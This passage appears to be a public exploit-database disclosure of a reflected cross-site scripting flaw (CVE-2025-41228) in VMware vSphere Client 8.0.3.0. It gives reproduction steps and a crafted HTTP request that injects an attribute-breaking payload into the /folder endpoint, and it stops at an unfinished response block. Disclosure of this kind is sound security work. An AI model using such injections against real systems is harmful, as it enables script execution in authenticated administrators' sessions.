# VMware vSphere Client 8.0.3.0 - Reflected Cross-Site Scripting (XSS)
- **Exploit Title**: VMware vSphere Client 8.0.3.0 - Reflected Cross-Site Scripting (XSS)
- **Date**: 2025-08-08
- **Exploit Author**: Imraan Khan (Lich-Sec)
- **Vendor Homepage**: [https://www.vmware.com](https://www.vmware.com)
- **Version**: vSphere Client 8.0.3.0
- **Tested On**: Web interface (Chrome 138)
- **CVE**: CVE-2025-41228
- **Category**: WebApps
---
## Description
A reflected Cross-Site Scripting (XSS) vulnerability exists in VMware vSphere Client version 8.0.3.0. The application fails to sanitize input passed via a query string to the `/folder` endpoint, resulting in arbitrary JavaScript execution when the reflected value is rendered into an HTML form’s `action` attribute.
The vulnerability was confirmed by intercepting a request through Burp Suite and injecting a malicious payload. This XSS only successfully executes when the response is rendered by a browser within an **active session**, such as one initiated via prior authentication.
---
## Steps to Reproduce
### 1. Initiate request to vulnerable endpoint
Open a browser and navigate to:
```
https://host/folder?ht7j4
```
This sends a benign request that you will intercept.
---
### 2. Intercept and modify the request using Burp Suite
With Burp Suite proxy enabled, capture the request and modify the query string to inject the XSS payload:
```
GET /folder?ht7j4">tnkav=1 HTTP/2
Host: 192.168.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Referer: https://192.168.x.x/
Accept: text/html,application/xhtml+xml
```
Then forward the request to the server.
---
### 3. Observe the reflected payload in the HTTP response
In the Burp HTTP Response, the payload appears unencoded within the HTML:
```html